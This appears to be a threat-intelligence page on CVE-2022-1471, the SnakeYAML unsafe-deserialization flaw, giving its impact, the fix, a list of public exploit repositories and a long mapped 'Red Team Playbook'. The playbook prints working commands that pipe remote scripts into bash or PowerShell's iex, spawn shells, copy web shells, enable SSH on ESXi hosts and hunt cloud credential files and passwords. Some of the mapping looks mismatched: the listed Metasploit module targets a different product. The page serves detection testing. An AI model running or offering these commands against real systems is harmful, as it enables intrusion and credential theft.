CVE-2022-1471
Overview
This vulnerability is an unsafe deserialization flaw in the SnakeYAML library's Constructor() class, which does not restrict the types of objects instantiated during YAML deserialization. The root cause lies in the absence of type constraints in the deserialization process, allowing arbitrary Java objects to be created. The affected component is the SnakeYAML Constructor class used for parsing YAML content.
Vulnerability Description
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.
Impact
An attacker with the ability to supply malicious YAML content to an application using the vulnerable SnakeYAML Constructor class can execute arbitrary code remotely. The attack requires network access and the ability to influence YAML input processed by the application, with no user interaction needed. This can lead to full system compromise or lateral movement within affected environments. The CVSS vector indicates low attack complexity and no user interaction (AV:N/AC:L/UI:N), with high confidentiality, integrity, and availability impacts (C:H/I:H/A:L).
Solution
Upgrade SnakeYAML to version 2.0 or later, where the deserialization process uses SafeConstructor to enforce type restrictions. Alternatively, configure applications to explicitly use SafeConstructor when parsing untrusted YAML content. Detailed patch and mitigation instructions are available in the Google Security Research advisory (GHSA-mjmj-j48q-9wg2) and the SnakeYAML issue tracker on Bitbucket.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in SnakeYaml's Constructor class arises from its lack of restrictions on the types that can be instantiated during the deserialization process. This oversight allows an attacker to craft malicious YAML content that, when deserialized, can lead to the execution of arbitrary code on the server. The Constructor class is designed to convert YAML documents into Java objects, but without proper safeguards, it can instantiate any class, including those that could compromise the security of the application. This flaw is particularly concerning because deserialization is a common operation in many applications, making it a frequent target for exploitation.
Attack vectors exploiting this vulnerability can vary, but they typically involve an attacker providing specially crafted YAML input to an application that uses SnakeYaml for deserialization. For instance, an attacker might send a payload through a web application that processes user input or configuration files in YAML format. If the application does not implement adequate validation or sanitization of the input, the deserialization process can result in the execution of malicious code. Scenarios could range from remote code execution on a web server to the potential for data exfiltration or service disruption, depending on the privileges of the application and the environment in which it operates.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on SnakeYaml for processing untrusted input. The high CVSS score of 9.8 indicates a critical risk, suggesting that successful exploitation could lead to significant breaches, including unauthorized access to sensitive data, system compromise, and potential financial loss. Businesses may face reputational damage, regulatory penalties, and operational disruptions as a result of such incidents. The implications extend beyond immediate technical concerns, as stakeholders may lose trust in the organization’s ability to protect data and maintain secure operations.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First, they should conduct an inventory of their software dependencies to identify instances of SnakeYaml in use, particularly versions prior to 2.0. Regular vulnerability assessments and penetration testing can help uncover instances of insecure deserialization in applications. Additionally, implementing logging and monitoring solutions can provide insights into unusual behavior that may indicate exploitation attempts.
Mitigation strategies should prioritize upgrading to version 2.0 or later of SnakeYaml, which includes the SafeConstructor designed to restrict deserialization to safe types. Furthermore, developers should adopt secure coding practices, such as validating and sanitizing all input, and employing whitelisting techniques to limit the types of objects that can be deserialized. By combining these strategies, organizations can significantly reduce their risk exposure and enhance their overall security posture against this and similar vulnerabilities.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-1471, accompanied by the emergence of multiple new proof-of-concept exploits circulating within attacker communities. Our telemetry indicates that adversaries are increasingly leveraging these publicly available tools to automate and scale attacks against vulnerable SnakeYAML implementations. Although the EPSS score remains high and stable, the broadened exploit landscape elevates the practical risk to organizations still running unpatched or improperly configured versions. This development underscores a growing operationalization of the vulnerability, increasing the likelihood of successful remote code execution incidents. Consequently, defenders should regard the threat level as heightened due to both increased attacker activity and the availability of refined exploitation resources.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Snakeyaml Project | Snakeyaml | All |
cpe:2.3:a:snakeyaml_project:snakeyaml:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
PyTorch Model Server Registration and Deserialization RCE
exploits/multi/http/torchserver_cve_2023_43654
|
Idan Levcovich, Guy Kaplan, Gal Elbaz +2 | Unknown | - | View |
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
1fabunicorn/SnakeYAML-CVE-2022-1471-POC
Code for veracode blog
|
1fabunicorn | 8 | 4 | 2023-03-02 | View |
|
falconkei/snakeyaml_cve_poc
SnakeYAML-CVE-2022-1471-POC
|
falconkei | 4 | 4 | 2023-05-08 | View |
|
anupamojha-eng/sentinel-transitive-cve-demo
Sentinel demo: transitive snakeyaml CVE-2022-1471 via Spring Boot + exploitable code pattern
|
anupamojha-eng | 0 | 0 | 2026-06-01 | View |
|
jelee2555/CVE-2022-1471-attacker
attacker
|
jelee2555 | 0 | 0 | 2026-02-26 | View |
|
seal-sec-demo-2/yaml-payload
SnakeYAML CVE-2022-1471 exploit payload for demo
|
seal-sec-demo-2 | 0 | 0 | 2026-02-05 | View |
Threat Feed
3 eventsSighting activity recorded
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
55%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.